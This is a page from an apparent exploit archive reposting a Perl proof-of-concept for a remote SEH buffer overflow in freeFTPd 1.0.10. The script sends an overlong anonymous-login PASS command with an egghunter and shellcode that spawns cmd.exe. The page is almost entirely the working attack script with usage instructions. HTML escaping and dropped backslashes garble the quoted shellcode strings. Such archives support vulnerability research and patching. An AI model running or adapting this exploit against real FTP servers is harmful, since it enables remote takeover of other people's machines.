Home / exploitsPDF  

FreeFTPd 1.0.10 anonymous-auth PASS SEH buffer overflow

Posted on 22 August 2013

<pre>#!/usr/bin/perl
# freeFTPd 1.0.10 anonymous-auth PASS SEH buffer overflow
# PoC by Wireghoul - www.justanotherhacker.com
# Date: 20130820
# Tested on: XPSP3
# Similar exploits:
# EDB 23079 1330 1339
# Greetz corelan, TecR0C, mr_me, jjkakakk
 
if (scalar(@ARGV) != 2) { &quot;Usage $0 host port
&quot;; exit; }
use IO::Socket::INET;
# Null byte in ppr forces a backwards short jump allowing 128 bytes
shellcode max
# Thus we use an egghunter
my $egghunter =
&quot;x66x81xCAxFFx0Fx42x52x6Ax43x58xCDx2Ex3Cx05x5Ax74xEFxB8&quot;.
&quot;WRGL&quot;.
&quot;x8BxFAxAFx75xEAxAFx75xE7xFFxE7&quot;;
# I expect the max lenght for this is ~1024 bytes, didn't bother checking
# Spawn cmd.exe from msfpayload windows/exec CMD=cmd.exe R | msfencode -b
'x0ax0d' -t perl
my $shell =
&quot;xd9xebxd9x74x24xf4x5exbfxe0xddxfbx11x33xc9&quot; .
&quot;xb1x32x31x7ex1ax83xc6x04x03x7ex16xe2x15x21&quot; .
&quot;x13x98xd5xdaxe4xfbx5cx3fxd5x29x3ax4bx44xfe&quot; .
&quot;x49x19x65x75x1fx8axfexfbxb7xbdxb7xb6xe1xf0&quot; .
&quot;x48x77x2dx5ex8ax19xd1x9dxdfxf9xe8x6dx12xfb&quot; .
&quot;x2dx93xddxa9xe6xdfx4cx5ex83xa2x4cx5fx43xa9&quot; .
&quot;xedx27xe6x6ex99x9dxe9xbex32xa9xa1x26x38xf5&quot; .
&quot;x11x56xedxe5x6dx11x9axdex06xa0x4ax2fxe7x92&quot; .
&quot;xb2xfcxd6x1ax3fxfcx1fx9cxa0x8bx6bxdex5dx8c&quot; .
&quot;xa8x9cxb9x19x2cx06x49xb9x94xb6x9ex5cx5fxb4&quot; .
&quot;x6bx2ax07xd9x6axffx3cxe5xe7xfex92x6fxb3x24&quot; .
&quot;x36x2bx67x44x6fx91xc6x79x6fx7dxb6xdfxe4x6c&quot; .
&quot;xa3x66xa7xfax32xeaxd2x42x34xf4xdcxe4x5dxc5&quot; .
&quot;x57x6bx19xdaxb2xcfxd5x90x9ex66x7ex7dx4bx3b&quot; .
&quot;xe3x7exa6x78x1axfdx42x01xd9x1dx27x04xa5x99&quot; .
&quot;xd4x74xb6x4fxdax2bxb7x45xb9xa6x23x48x58x41&quot; .
&quot;xc9x94&quot;;
my $egg = &quot;USER WRGLWRGL$shell
&quot;;
my $usr = &quot;USER anonymous
&quot;; # Must be an existing anonymous account
# I'm lazy, NOPs are fine by me
my $pre = &quot;PASS &quot; . &quot;x90&quot; x (797 - length($egghunter)) . $egghunter;
my $seh1 = &quot;x90x90xEBx80&quot;; # nop, nop, jmp+4
my $seh2 = &quot;xf0x42x41x00&quot;; # PPR from freeFTPDService.exe (only unsafe
SEH module), 0x004142f0
my $pad = &quot;X&quot; x 209 .&quot;
&quot;;
 
my $payload = $pre . $seh1 . $seh2 . $pad;
 
my $sock = IO::Socket::INET-&gt;new(&quot;$ARGV[0]:$ARGV[1]&quot;) or die &quot;Unable to
connect!
&quot;;
my $eggsock = IO::Socket::INET-&gt;new(&quot;$ARGV[0]:$ARGV[1]&quot;) or die &quot;Unable to
connect!
&quot;;
print $eggsock $egg;
sleep 1;
print $sock $usr;
sleep 1;
print &quot;Preparing exploit
&quot;;
sleep 1;
print $sock $payload;
print &quot;Exploiting
&quot;;
sleep 3;
print &quot;Done
&quot;;
</pre>

 

TOP

Malware :

Exploits :